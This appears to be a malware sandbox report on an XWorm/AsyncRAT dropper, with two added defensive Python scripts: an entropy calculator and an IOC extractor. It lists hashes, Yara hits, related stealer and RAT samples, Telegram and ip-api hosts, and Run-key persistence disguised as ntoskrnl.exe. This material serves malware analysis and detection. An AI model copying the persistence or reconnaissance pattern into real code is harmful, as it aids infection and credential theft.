• Excluded domains from analysis (whitelisted): ocsp.digicert.com, login.live.com, slscr.update.microsoft.com, sls.update.microsoft.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com, glb.sls.prod.dcat.dsp.trafficmanager.net
• Execution Graph export aborted for target RdLfpZY5A9.exe, PID 7312 because it is empty
• Execution Graph export aborted for target powershell.exe, PID 7712 because it is empty
• Not all processes were analyzed; the report is missing behavior information
• Report creation exceeded the maximum time and may be missing disassembly code information.
• Report size exceeded maximum capacity and may be missing behavior information.
• Report size exceeded maximum capacity and may be missing disassembly code.
• Report size getting too big: too many NtCreateKey calls found.
• Report size getting too big: too many NtOpenKeyEx calls found.
• Report size getting too big: too many NtProtectVirtualMemory calls found.
• Report size getting too big: too many NtQueryValueKey calls found.
• Report size getting too big: too many NtReadVirtualMemory calls found.
• VT rate limit hit for: RdLfpZY5A9.exe
Time | Type | Description
12:53:04 | API Interceptor | 53x Sleep call for process: powershell.exe modified
12:53:38 | API Interceptor | 407465x Sleep call for process: winlogon.exe modified
12:53:39 | API Interceptor | 313180x Sleep call for process: lsass.exe modified
12:53:40 | API Interceptor | 5412x Sleep call for process: svchost.exe modified
12:53:42 | API Interceptor | 391643x Sleep call for process: dwm.exe modified
12:53:43 | API Interceptor | 390x Sleep call for process: KrnlSetupSus.exe modified
12:53:59 | API Interceptor | 138x Sleep call for process: spoolsv.exe modified
12:54:08 | API Interceptor | 84x Sleep call for process: dllhost.exe modified
18:53:45 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run ntoskrnl C:\ProgramData\ntoskrnl.exe
18:53:53 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run ntoskrnl C:\ProgramData\ntoskrnl.exe
18:54:02 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ntoskrnl.lnk
                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                            208.95.112.17laJ4zKd8O.exeGet hashmaliciousXWormBrowse
                                                                                                            • ip-api.com/line/?fields=hosting
                                                                                                            3edTbzftGf.exeGet hashmaliciousDiscord Token Stealer, DotStealerBrowse
                                                                                                            • ip-api.com/json/
                                                                                                            gjvU5KOFhX.exeGet hashmaliciousDiscord Token Stealer, Millenuim RATBrowse
                                                                                                            • ip-api.com/json/
                                                                                                            hvqc3lk7ly.exeGet hashmaliciousDiscord Token Stealer, DotStealerBrowse
                                                                                                            • ip-api.com/json/
                                                                                                            da6ke5KbfB.exeGet hashmaliciousAsyncRAT, Babadeda, XWormBrowse
                                                                                                            • ip-api.com/line/?fields=hosting
                                                                                                            03VPFXH490.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                                                            • ip-api.com/line/?fields=hosting
                                                                                                            Chrome Browser Update.exeGet hashmaliciousPredatorBrowse
                                                                                                            • ip-api.com/json/
                                                                                                            boleto.exeGet hashmaliciousXWormBrowse
                                                                                                            • ip-api.com/line/?fields=hosting
                                                                                                            taskhost.exeGet hashmaliciousXWormBrowse
                                                                                                            • ip-api.com/line/?fields=hosting
                                                                                                            XClient.exeGet hashmaliciousXWormBrowse
                                                                                                            • ip-api.com/line/?fields=hosting
                                                                                                            149.154.167.2203edTbzftGf.exeGet hashmaliciousDiscord Token Stealer, DotStealerBrowse
                                                                                                              Shipment 990847575203.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                gjvU5KOFhX.exeGet hashmaliciousDiscord Token Stealer, Millenuim RATBrowse
                                                                                                                  hvqc3lk7ly.exeGet hashmaliciousDiscord Token Stealer, DotStealerBrowse
                                                                                                                    TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                      HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                        888.exeGet hashmaliciousLuca StealerBrowse
                                                                                                                          888.exeGet hashmaliciousLuca StealerBrowse
                                                                                                                            https://grizzled-overjoyed-bag.glitch.me/#comercial.portugal@eurofred.comGet hashmaliciousHTMLPhisherBrowse
                                                                                                                              XClient.exeGet hashmaliciousXWormBrowse
                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                pastebin.comfile.exeGet hashmaliciousXWormBrowse
                                                                                                                                • 172.67.19.24
                                                                                                                                main.exeGet hashmaliciousUnknownBrowse
                                                                                                                                • 104.20.4.235
                                                                                                                                CVmkXJ7e0a.exeGet hashmaliciousSheetRatBrowse
                                                                                                                                • 104.20.4.235
                                                                                                                                http://annavirgili.comGet hashmaliciousCAPTCHA Scam ClickFixBrowse
                                                                                                                                • 172.67.19.24
                                                                                                                                http://annavirgili.comGet hashmaliciousCAPTCHA Scam ClickFixBrowse
                                                                                                                                • 172.67.19.24
                                                                                                                                KrnlSetup.exeGet hashmaliciousXWormBrowse
                                                                                                                                • 104.20.3.235
                                                                                                                                Revo.Uninstaller.Pro.v5.3.4.exeGet hashmaliciousUnknownBrowse
                                                                                                                                • 104.20.3.235
                                                                                                                                Revo.Uninstaller.Pro.v5.3.4.exeGet hashmaliciousUnknownBrowse
                                                                                                                                • 104.20.4.235
                                                                                                                                rrats.exeGet hashmaliciousAsyncRATBrowse
                                                                                                                                • 172.67.19.24
                                                                                                                                Q8o0Mx52Fd.exeGet hashmaliciousUnknownBrowse
                                                                                                                                • 104.20.3.235
                                                                                                                                ip-api.com7laJ4zKd8O.exeGet hashmaliciousXWormBrowse
                                                                                                                                • 208.95.112.1
                                                                                                                                3edTbzftGf.exeGet hashmaliciousDiscord Token Stealer, DotStealerBrowse
                                                                                                                                • 208.95.112.1
                                                                                                                                gjvU5KOFhX.exeGet hashmaliciousDiscord Token Stealer, Millenuim RATBrowse
                                                                                                                                • 208.95.112.1
                                                                                                                                hvqc3lk7ly.exeGet hashmaliciousDiscord Token Stealer, DotStealerBrowse
                                                                                                                                • 208.95.112.1
                                                                                                                                da6ke5KbfB.exeGet hashmaliciousAsyncRAT, Babadeda, XWormBrowse
                                                                                                                                • 208.95.112.1
                                                                                                                                03VPFXH490.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                                                                                • 208.95.112.1
                                                                                                                                Chrome Browser Update.exeGet hashmaliciousPredatorBrowse
                                                                                                                                • 208.95.112.1
                                                                                                                                boleto.exeGet hashmaliciousXWormBrowse
                                                                                                                                • 208.95.112.1
                                                                                                                                taskhost.exeGet hashmaliciousXWormBrowse
                                                                                                                                • 208.95.112.1
                                                                                                                                XClient.exeGet hashmaliciousXWormBrowse
                                                                                                                                • 208.95.112.1
                                                                                                                                api.telegram.org3edTbzftGf.exeGet hashmaliciousDiscord Token Stealer, DotStealerBrowse
                                                                                                                                • 149.154.167.220
                                                                                                                                Shipment 990847575203.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                • 149.154.167.220
                                                                                                                                gjvU5KOFhX.exeGet hashmaliciousDiscord Token Stealer, Millenuim RATBrowse
                                                                                                                                • 149.154.167.220
                                                                                                                                hvqc3lk7ly.exeGet hashmaliciousDiscord Token Stealer, DotStealerBrowse
                                                                                                                                • 149.154.167.220
                                                                                                                                TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                • 149.154.167.220
                                                                                                                                HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                • 149.154.167.220
                                                                                                                                888.exeGet hashmaliciousLuca StealerBrowse
                                                                                                                                • 149.154.167.220
                                                                                                                                888.exeGet hashmaliciousLuca StealerBrowse
                                                                                                                                • 149.154.167.220
                                                                                                                                https://grizzled-overjoyed-bag.glitch.me/#comercial.portugal@eurofred.comGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                • 149.154.167.220
                                                                                                                                XClient.exeGet hashmaliciousXWormBrowse
                                                                                                                                • 149.154.167.220
                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                TELEGRAMRUfile.exeGet hashmaliciousAmadey, LummaC Stealer, Stealc, Vidar, XmrigBrowse
                                                                                                                                • 149.154.167.99
                                                                                                                                3edTbzftGf.exeGet hashmaliciousDiscord Token Stealer, DotStealerBrowse
                                                                                                                                • 149.154.167.220
                                                                                                                                7VfKPMdmiX.exeGet hashmaliciousUnknownBrowse
                                                                                                                                • 149.154.167.99
                                                                                                                                Shipment 990847575203.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                • 149.154.167.220
                                                                                                                                7VfKPMdmiX.exeGet hashmaliciousUnknownBrowse
                                                                                                                                • 149.154.167.99
                                                                                                                                file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, PureLog Stealer, Stealc, VidarBrowse
                                                                                                                                • 149.154.167.99
                                                                                                                                file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, Stealc, Vidar, XmrigBrowse
                                                                                                                                • 149.154.167.99
                                                                                                                                file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, Stealc, Vidar, XmrigBrowse
                                                                                                                                • 149.154.167.99
                                                                                                                                file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, Stealc, Vidar, XmrigBrowse
                                                                                                                                • 149.154.167.99
                                                                                                                                file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, Stealc, Vidar, XmrigBrowse
                                                                                                                                • 149.154.167.99
                                                                                                                                TUT-ASUS7laJ4zKd8O.exeGet hashmaliciousXWormBrowse
                                                                                                                                • 208.95.112.1
                                                                                                                                3edTbzftGf.exeGet hashmaliciousDiscord Token Stealer, DotStealerBrowse
                                                                                                                                • 208.95.112.1
                                                                                                                                gjvU5KOFhX.exeGet hashmaliciousDiscord Token Stealer, Millenuim RATBrowse
                                                                                                                                • 208.95.112.1
                                                                                                                                hvqc3lk7ly.exeGet hashmaliciousDiscord Token Stealer, DotStealerBrowse
                                                                                                                                • 208.95.112.1
                                                                                                                                da6ke5KbfB.exeGet hashmaliciousAsyncRAT, Babadeda, XWormBrowse
                                                                                                                                • 208.95.112.1
                                                                                                                                03VPFXH490.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                                                                                • 208.95.112.1
                                                                                                                                Chrome Browser Update.exeGet hashmaliciousPredatorBrowse
                                                                                                                                • 208.95.112.1
                                                                                                                                boleto.exeGet hashmaliciousXWormBrowse
                                                                                                                                • 208.95.112.1
                                                                                                                                taskhost.exeGet hashmaliciousXWormBrowse
• 208.95.112.1
Match | Associated Sample Name / URL | Detection | Threat Name | Context
208.95.112.1 | XClient.exe | malicious | XWorm | 208.95.112.1
TRUSTPOWERLTD-AS-AP TrustPower Ltd NZ | KrnlSetup.exe | malicious | XWorm | 115.69.183.222
  | la.bot.powerpc.elf | malicious | Unknown | 139.180.112.101
  | 357oRnNepg.elf | malicious | Unknown | 14.137.171.2
  | HOHD9C7W11.elf | malicious | Moobot | 116.251.148.249
  | v859oajfVH.elf | malicious | Unknown | 115.69.189.181
  | pandora.x86 | malicious | Mirai | 116.251.148.208
  | L1fzVJ2Qwl | malicious | Unknown | 139.180.79.19
  | z3hir.arm | malicious | Mirai | 139.180.79.43
  | notabotnet.arm | malicious | Mirai | 101.53.197.251
  | OlR2ldXttM | malicious | Unknown | 101.53.215.29
Match | Associated Sample Name / URL | Detection | Threat Name | Context
3b5074b1b5d032e5620f69f9f700ff0e | FEDEX234598765.html | malicious | WinSearchAbuse | 149.154.167.220, 104.20.4.235
  | 3edTbzftGf.exe | malicious | Discord Token Stealer, DotStealer | 149.154.167.220, 104.20.4.235
  | NOTIFICATION_OF_DEPENDANTS.vbs | malicious | Unknown | 149.154.167.220, 104.20.4.235
  | PO_0099822111ORDER.js | malicious | Remcos | 149.154.167.220, 104.20.4.235
  | Shipment 990847575203.pdf.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220, 104.20.4.235
  | file.exe | malicious | XWorm | 149.154.167.220, 104.20.4.235
  | gjvU5KOFhX.exe | malicious | Discord Token Stealer, Millenuim RAT | 149.154.167.220, 104.20.4.235
  | svhost.vbs | malicious | Unknown | 149.154.167.220, 104.20.4.235
  | hvqc3lk7ly.exe | malicious | Discord Token Stealer, DotStealer | 149.154.167.220, 104.20.4.235
  | TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220, 104.20.4.235
No context
File:C:\ProgramData\Install.exe (path taken from the Yara hit below)
Process:C:\Users\user\Desktop\RdLfpZY5A9.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):165888
Entropy (8bit):7.815558274002771
Encrypted:false
Note (editor's reading, not sandbox output): 7.82 bits per byte on a 162 KB native PE is close to the 8.0 ceiling, which points to a compressed or encrypted payload inside the file even though the sandbox's Encrypted flag is false.
SSDEEP:3072:eQpsbfyjozLuU7WzDvqu5faCaVKx9Hbsd8m8Z7f+BKA+YeufSMyoU+:eQpsbfyjoz5Aiu9wVKjHod5IfeXeuf7I
MD5:B5F6C9AC3389F5E61B4C750CF950E27C
SHA1:DBE0CCA47AB36938ED022311F97736FC2915FF06
SHA-256:BD4062E261A7AC5893E95A88D79564B44AAD58CA446C3649A50589415B64D098
SHA-512:014F187B94012F0A5077908107A7B0F3C7EFAE9EDF1A6EA7C395E387830E2FE84105A12EA8446311E0FC25FBE2790F56B614C9726507A22FEE7BAA46B2C4487C
Malicious:true
Yara Hits:
• Rule: JoeSecurity_Rootkit77, Description: Yara detected 77Rootkit, Source: C:\ProgramData\Install.exe, Author: Joe Security
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
• Antivirus: ReversingLabs, Detection: 70%
Preview:MZ......................@.......................................hr......!..L.!This program cannot be run in DOS mode....$........P.R.1...1...1.......1.......1...1...1..r....1..r....1...1u..1..r....1..Rich.1..................PE..L....k]g...............*.....x............... ....@.......................................@.................................D9..x....@..8V...........................8..8............................................ ...............................text............................... ..`.rdata..4.... ......................@..@.rsrc...8V...@...X..................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................................................................................................
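The "Entropy (8bit)" figure in these records is Shannon entropy in bits per byte, and a whole-file value near 8.0 (as for the 165888-byte Install.exe above) says only that a compressed or encrypted blob is somewhere in the file. The example below, added here and not part of the Joe Sandbox output, reproduces that figure and breaks it down per PE section with the standard library alone, which is the check that shows where such a payload lives. It does not touch the real sample: build_test_pe() constructs a small synthetic PE32 as test data, and the 7.2 bits/byte threshold for "looks packed" is an assumption, not a sandbox setting.

```python
"""Reproduce the sandbox 'Entropy (8bit)' figure and compute it per PE section.

Added example for this report page, not Joe Sandbox code. The section-table
walk follows the standard PE layout; build_test_pe() is constructed test data
and the 7.2 threshold is an assumed heuristic.
"""
import math
import struct
from collections import Counter


def shannon_entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte: -sum(p * log2 p) over the byte values seen."""
    if not data:
        return 0.0
    n = len(data)
    ent = -sum((c / n) * math.log2(c / n) for c in Counter(data).values())
    return ent if ent > 0 else 0.0


def pe_sections(data: bytes) -> list:
    """Return (name, raw_offset, raw_size) for every section of a PE32/PE32+ image.

    Walks MZ -> e_lfanew (offset 0x3C) -> 'PE\\0\\0' -> COFF header (NumberOfSections
    at +6, SizeOfOptionalHeader at +20) -> the 40-byte IMAGE_SECTION_HEADER entries.
    """
    if len(data) < 0x40 or data[:2] != b"MZ":
        raise ValueError("not an MZ image")
    pe = struct.unpack_from("<I", data, 0x3C)[0]
    if data[pe:pe + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    nsec = struct.unpack_from("<H", data, pe + 6)[0]
    opt_size = struct.unpack_from("<H", data, pe + 20)[0]
    table = pe + 24 + opt_size
    sections = []
    for i in range(nsec):
        # Only the first 24 bytes of each header are needed here.
        name, _vsize, _va, raw_size, raw_ptr = struct.unpack_from("<8sIIII", data, table + 40 * i)
        sections.append((name.rstrip(b"\0").decode("ascii", "replace"), raw_ptr, raw_size))
    return sections


def entropy_report(data: bytes, hot_threshold: float = 7.2) -> dict:
    """Whole-file and per-section entropy plus the sections that look compressed/encrypted."""
    per_section = {}
    for name, off, size in pe_sections(data):
        per_section[name] = round(shannon_entropy(data[off:off + size]), 4)
    hot = [n for n, e in per_section.items() if e >= hot_threshold]   # assumed threshold
    return {
        "entropy": round(shannon_entropy(data), 4),
        "sections": per_section,
        "high_entropy_sections": hot,
    }


def build_test_pe() -> bytes:
    """Constructed two-section PE32 (not a real sample): an all-zero .text and a
    .rsrc holding every byte value equally often, i.e. exactly 8.0 bits/byte."""
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40)              # e_lfanew = 0x40
    coff = b"PE\0\0" + struct.pack("<HHIIIHH", 0x14C, 2, 0, 0, 0, 0, 0x102)  # 2 sections, no optional header
    hdr = struct.pack("<8sIIIIIIHHI", b".text", 0x200, 0x1000, 0x200, 0x200, 0, 0, 0, 0, 0x60000020)
    hdr += struct.pack("<8sIIIIIIHHI", b".rsrc", 0x1000, 0x2000, 0x1000, 0x400, 0, 0, 0, 0, 0x40000040)
    image = dos + coff + hdr
    image += b"\0" * (0x200 - len(image))                            # pad headers up to .text
    image += b"\0" * 0x200                                           # .text at 0x200, entropy 0.0
    image += bytes(range(256)) * 16                                  # .rsrc at 0x400, entropy 8.0
    return image


if __name__ == "__main__":
    import json
    import sys
    blob = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_test_pe()
    print(json.dumps(entropy_report(blob), indent=2))
```

Run it with a file path to get the same whole-file figure the report shows plus the per-section breakdown; without an argument it runs on the synthetic image.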
File:C:\ProgramData\KrnlSetupSus.exe (path taken from the Yara hits below)
Process:C:\Users\user\Desktop\RdLfpZY5A9.exe
File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:dropped
Size (bytes):87040
Entropy (8bit):5.976836669615479
Encrypted:false
SSDEEP:1536:JyjBt6rjD8L0x+dykPoziDzbQcvxUu++6ZOF6g+NRKWi:J0H64IsMjIbQcZUdOsbNdi
MD5:6435792D63BE630506EB9EEBBD1E3878
SHA1:37F7023B735B3F8CD65803BC704AD529F896FF4A
SHA-256:DC4F64BA228C5D301A8D64BD8C172B45779583375D3C1BE3C83C3CD1C7D2A5E3
SHA-512:88AF5A007D8D21B057740F42EBEA3C4FE529924637B2C6B027ED520905EE8445F6B70D7A069457F82134E2C4405B0641F7620ADCCD8ABB1C2CA1DD62CD127955
Malicious:true
Yara Hits:
• Rule: JoeSecurity_TelegramRecon, Description: Yara detected Telegram Recon, Source: C:\ProgramData\KrnlSetupSus.exe, Author: Joe Security
• Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\ProgramData\KrnlSetupSus.exe, Author: Joe Security
• Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\ProgramData\KrnlSetupSus.exe, Author: Joe Security
• Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: C:\ProgramData\KrnlSetupSus.exe, Author: Joe Security
• Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\ProgramData\KrnlSetupSus.exe, Author: ditekSHen
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
• Antivirus: ReversingLabs, Detection: 74%
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...J.[g.................J...........i... ........@.. ....................................@.................................4i..W.................................................................................... ............... ..H............text....I... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................pi......H........p..D.......&.....................................................(....*.r...p*. ...*..(....*.rm..p*. E/..*.s.........s.........s.........s.........*.r...p*. ....*.r...p*. mh..*.r...p*. 6/..*.r...p*. ...*.r...p*. ~.H.*..((...*.r...p*. S...*.r...p*. ...*.(-...-.(....,.+.(/...,.+.(,...,.+.(+...,..(e...*"(....+.*&(,...&+.*.+5sr... .... .'..os...(,...~....-.(e...(W...~....ot...&.-.*.r+..p*. .(T.*.rG..p*.rc..p*. .x!.*.r...p*. O...*.r...p*.r...p*.r...p*.r...p*. ...*.r..
File:C:\ProgramData\ntoskrnl.exe (path taken from the Yara hits below)
Note (editor's reading, not sandbox output): byte-identical to the C:\ProgramData\KrnlSetupSus.exe record above (same size, MD5 and SHA-256) and written by KrnlSetupSus.exe itself, i.e. the XWorm payload copying itself under the name of the Windows kernel image.
Process:C:\ProgramData\KrnlSetupSus.exe
File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:dropped
Size (bytes):87040
Entropy (8bit):5.976836669615479
Encrypted:false
SSDEEP:1536:JyjBt6rjD8L0x+dykPoziDzbQcvxUu++6ZOF6g+NRKWi:J0H64IsMjIbQcZUdOsbNdi
MD5:6435792D63BE630506EB9EEBBD1E3878
SHA1:37F7023B735B3F8CD65803BC704AD529F896FF4A
SHA-256:DC4F64BA228C5D301A8D64BD8C172B45779583375D3C1BE3C83C3CD1C7D2A5E3
SHA-512:88AF5A007D8D21B057740F42EBEA3C4FE529924637B2C6B027ED520905EE8445F6B70D7A069457F82134E2C4405B0641F7620ADCCD8ABB1C2CA1DD62CD127955
Malicious:true
Yara Hits:
• Rule: JoeSecurity_TelegramRecon, Description: Yara detected Telegram Recon, Source: C:\ProgramData\ntoskrnl.exe, Author: Joe Security
• Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\ProgramData\ntoskrnl.exe, Author: Joe Security
• Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\ProgramData\ntoskrnl.exe, Author: Joe Security
• Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: C:\ProgramData\ntoskrnl.exe, Author: Joe Security
• Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\ProgramData\ntoskrnl.exe, Author: ditekSHen
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
• Antivirus: ReversingLabs, Detection: 74%
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...J.[g.................J...........i... ........@.. ....................................@.................................4i..W.................................................................................... ............... ..H............text....I... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................pi......H........p..D.......&.....................................................(....*.r...p*. ...*..(....*.rm..p*. E/..*.s.........s.........s.........s.........*.r...p*. ....*.r...p*. mh..*.r...p*. 6/..*.r...p*. ...*.r...p*. ~.H.*..((...*.r...p*. S...*.r...p*. ...*.(-...-.(....,.+.(/...,.+.(,...,.+.(+...,..(e...*"(....+.*&(,...&+.*.+5sr... .... .'..os...(,...~....-.(e...(W...~....ot...&.-.*.r+..p*. .(T.*.rG..p*.rc..p*. .x!.*.r...p*. O...*.r...p*.r...p*.r...p*.r...p*. ...*.r..
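The dropped-file records above are what a responder turns into indicators, and the two records for KrnlSetupSus.exe and ntoskrnl.exe show why that needs de-duplication: one file, two names, two dropping processes. The script below is an added example, not Joe Sandbox code. It parses the report's "Key:Value" record layout, recovers each file's on-disk path from the Yara "Source:" field (the records themselves carry no path line), and merges records by SHA-256 so every path, dropping process, rule name and best AV score for a given file lands in one IOC. The embedded SAMPLE is a constructed excerpt of the records on this page (Preview, SSDEEP and SHA-512 lines omitted); the output layout is this example's own choice.

```python
"""Turn the dropped-file records of a Joe Sandbox report into de-duplicated IOCs.

Added example for this report page, not Joe Sandbox code. Field names follow
the report; SAMPLE is a constructed excerpt of the records above.
"""
import json
import re

YARA_RE = re.compile(r"Rule: (?P<rule>[^,]+), Description: (?P<desc>.*?), Source: (?P<src>.*?), Author: (?P<author>.*)")
AV_RE = re.compile(r"Antivirus: (?P<vendor>.*?), Detection: (?P<pct>\d+)%")

# Constructed excerpt of the records above (Preview, SSDEEP and SHA-512 omitted).
SAMPLE = r"""
Process:C:\Users\user\Desktop\RdLfpZY5A9.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Size (bytes):165888
MD5:B5F6C9AC3389F5E61B4C750CF950E27C
SHA-256:BD4062E261A7AC5893E95A88D79564B44AAD58CA446C3649A50589415B64D098
Malicious:true
Yara Hits:
• Rule: JoeSecurity_Rootkit77, Description: Yara detected 77Rootkit, Source: C:\ProgramData\Install.exe, Author: Joe Security
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: ReversingLabs, Detection: 70%
Process:C:\Users\user\Desktop\RdLfpZY5A9.exe
File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Size (bytes):87040
MD5:6435792D63BE630506EB9EEBBD1E3878
SHA-256:DC4F64BA228C5D301A8D64BD8C172B45779583375D3C1BE3C83C3CD1C7D2A5E3
Malicious:true
Yara Hits:
• Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\ProgramData\KrnlSetupSus.exe, Author: Joe Security
• Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\ProgramData\KrnlSetupSus.exe, Author: ditekSHen
Antivirus:
• Antivirus: ReversingLabs, Detection: 74%
Process:C:\ProgramData\KrnlSetupSus.exe
Size (bytes):87040
MD5:6435792D63BE630506EB9EEBBD1E3878
SHA-256:DC4F64BA228C5D301A8D64BD8C172B45779583375D3C1BE3C83C3CD1C7D2A5E3
Malicious:true
Yara Hits:
• Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\ProgramData\ntoskrnl.exe, Author: Joe Security
Antivirus:
• Antivirus: Avira, Detection: 100%
"""


def parse_records(text: str) -> list:
    """Split report text into one dict per 'Process:' record, with Yara/AV bullets parsed."""
    records, cur, section = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith("Process:"):               # every record opens with its dropping process
            cur = {"yara": [], "av": []}
            records.append(cur)
        if cur is None:
            continue
        if line in ("Yara Hits:", "Antivirus:"):       # a bullet list follows
            section = line[:4].lower()
        elif line.startswith("•"):
            body = line.lstrip("• ")
            m = (YARA_RE if section == "yara" else AV_RE).fullmatch(body)
            if m and section == "yara":
                cur["yara"].append(m.groupdict())
                cur["path"] = m["src"]                 # on-disk name of the dropped file
            elif m:
                cur["av"].append((m["vendor"], int(m["pct"])))
        else:
            section = None
            key, _, value = line.partition(":")        # split on the first ':' only; SSDEEP/Preview contain more
            cur[key.strip()] = value.strip()
    return records


def to_iocs(records: list) -> list:
    """One IOC per distinct SHA-256; paths, dropping processes, rules and AV scores are merged."""
    merged = {}
    for r in records:
        sha = r.get("SHA-256", "").lower()
        if not sha:
            continue                                   # nothing to pivot on without a hash
        ioc = merged.setdefault(sha, {
            "sha256": sha, "md5": r.get("MD5", "").lower(),
            "size": int(r.get("Size (bytes)", "0")), "file_type": r.get("File Type", ""),
            "malicious": False, "paths": set(), "dropped_by": set(),
            "yara_rules": set(), "max_av_detection": 0,
        })
        ioc["malicious"] |= r.get("Malicious") == "true"
        if r.get("path"):
            ioc["paths"].add(r["path"])
        ioc["dropped_by"].add(r.get("Process", ""))
        ioc["yara_rules"].update(y["rule"] for y in r["yara"])
        ioc["max_av_detection"] = max([ioc["max_av_detection"]] + [p for _, p in r["av"]])
    return [dict(v, paths=sorted(v["paths"]), dropped_by=sorted(v["dropped_by"]),
                 yara_rules=sorted(v["yara_rules"])) for v in merged.values()]


if __name__ == "__main__":
    print(json.dumps(to_iocs(parse_records(SAMPLE)), indent=2))
```

On the sample this yields two IOCs from three records; the XWorm one carries both C:\ProgramData\KrnlSetupSus.exe and C:\ProgramData\ntoskrnl.exe as paths and both RdLfpZY5A9.exe and KrnlSetupSus.exe as droppers, which is the self-copy a hunt query should look for.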
Process:C:\Users\user\Desktop\RdLfpZY5A9.exe
File Type:CSV text
Category:dropped
Size (bytes):654
Entropy (8bit):5.380476433908377
Encrypted:false
SSDEEP:12:Q3La/KDLI4MWuPXcp1OKbbDLI4MWuPOKfSSI6Khap+92n4MNQp3/VXM5gXu9tv:ML9E4KQwKDE4KGKZI6Kh6+84xp3/VclT
MD5:30E4BDFC34907D0E4D11152CAEBE27FA
SHA1:825402D6B151041BA01C5117387228EC9B7168BF
SHA-256:A7B8F7FFB4822570DB1423D61ED74D7F4B538CE73521CC8745BC6B131C18BE63
SHA-512:89FBCBCDB0BE5AD7A95685CF9AA4330D5B0250440E67DC40C6642260E024F52A402E9381F534A9824D2541B98B02094178A15BF2320148432EDB0D09B5F972BA
Malicious:true
Note (editor's reading, not sandbox output): the content is a .NET CLR assembly-binding usage log rather than data the sample authored. Its rows record the dropper binding the System, System.Core and Microsoft.VisualBasic native images, which points to a VB.NET-compiled loader (C# code can reference Microsoft.VisualBasic too).
